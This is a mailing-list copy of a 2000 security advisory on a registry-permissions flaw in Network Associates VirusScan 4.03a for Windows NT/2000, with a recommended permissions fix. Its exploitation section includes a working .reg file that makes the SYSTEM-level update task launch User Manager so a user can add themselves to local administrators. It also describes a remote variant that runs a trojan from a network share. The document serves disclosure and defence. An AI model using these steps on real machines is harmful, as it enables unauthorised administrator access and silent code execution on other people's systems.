'FW: EBE Security Advisory: VirusScan for Windows NT'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       ntbugtraq
Subject:    FW: EBE Security Advisory: VirusScan for Windows NT
From:       Kevin Beaumont <kevin () EBESECURITY ! ORG>
Date:       2000-08-15 18:20:30
[Download RAW message or body]

  EBE Security Advisory
  13/Aug/2000

  written by Kevin Beaumont (mailto:kevin@ebesecurity.org)

-------------------------------------------------------------------------------

PRODUCTS AFFECTED

- Network Associates VirusScan 4.03a for Windows NT4 Workstation
- Network Associates VirusScan 4.03a for Microsoft Window 2000 Professional
  (see below)


SCOPE OF ISSUE

Registry permissions checking issue.  LOCAL and REMOTE (see below) comprise of
system security, via any user with either 'User' or 'Power User'
authentication on any workstation which is running VirusScan.


DESCRIPTION OF ISSUE

The 'Network Associates Task Scheduler Service', which runs as SYSTEM, has a
feature which allows a program to be scheduled to run after a successful
DAT update.  The program called is also passed full SYSTEM privileges.

To edit the program called, you can bring up the VirusScan Console by
right clicking on the VirusScan icon in your task bar, and selecting
'Console'.  Now right click on 'Automatic DAT Update' and select
'Properties'.  Then choose 'Advanced'.

Attempting to set this value as a local user (either in the 'User' or
'Power User' group) via the VirusScan console fails - both the tick box
to enable the feature and text box used to enter the program name are
'greyed out'.

However, under the default installation options of VirusScan, the registry
key has full control to All authenicated users.

The registry key in question is:
HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\VirusScan\Tasks\Update

The keys in question are:
bExecAfterUpdate       = dword:00000000
szUpdateShellScript    = ""

There is an additional key which can be used to cause the program to be
called even if the DAT update fails:

bRetrieveOnly          = dword:00000000

All users have permissions to alter the actual scheduling of the update itself
via the VirusScan Console.


EXPLOITATION OF ISSUE

Numerous attack methods are available.  Here are a few examples we have
tested:

1) Save the following text as a file called 'userman.reg'.  Open the file
so the entries are entered into the registry.  Open the VirusScan Console,
and change the schedule of the Automatic DAT update so it runs within the
next few minutes.  Then sit and wait for User Manager to kick in.
Then add your login ID into the local administrator group...

--------start---------

[HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\VirusScan\Tasks\Update]
"szUpdateShellScript"="c:\winnt\system32\musrmgr.exe"
"bRetrieveOnly"=dword:00000001
"bExecAfterUpdate"=dword:00000001
"bSchedEnabled"=dword:00000001
"bLogToFile"=dword:00000000

--------snip-----------

2) Use regedt32.exe to remotely connect to other PCs in your organisation.
Set the above registry keys.  Select a program to run
(eg "\\file_server_1\share\trojanhorse.exe") and then wait for the Automatic
DAT update to kick in.  The program will run transparently to the user.


FIX

Use regedt32.exe to change permissions on
HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\VirusScan\Tasks and its subkeys.
All users should be READ access.  Administrators and SYSTEM should have full
control.


OTHER NOTES

We have not tested this issue with other versions of VirusScan.  We welcome
feedback as to the vulnerability of other versions of the product.

Our test systems were as follows:

- Windows NT 4 SP5, running VirusScan 4.03a installed via Management
Console.
- Windows NT 4 SP3, running VirusScan 4.03a installed manually.
- Windows 2000 SP1, running VirusScan 4.03a evaluation version.

Under our Microsoft Windows 2000 Professional test system, we found that
'Standard Users' did NOT have permissions to write/modify these registry keys.
However, 'Power Users' do have permissions to modify them.  If you work in
a company that uses Windows 2000 and standard users are given 'Power User'
permissions, you are affected.



-------------------------------------------------------------------------------
EBE Security - non-profit security organisation based in the UK.
http://www.ebesecurity.org.  email security@ebesecurity.org.

----------------------------------------------------------------------------
Delivery co-sponsored by VeriSign - The Internet Trust Company
============================================================================
Upgrade your server security to 128-bit SSL encryption!

Get VeriSign's FREE guide, "Securing Your Web Site for Business." You will
learn everything you need to know about using 128-bit SSL to encrypt your
e-commerce transactions for serious online security. Click here!
http://www.verisign.com/cgi-bin/go.cgi?a=n046607800016000
----------------------------------------------------------------------------

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic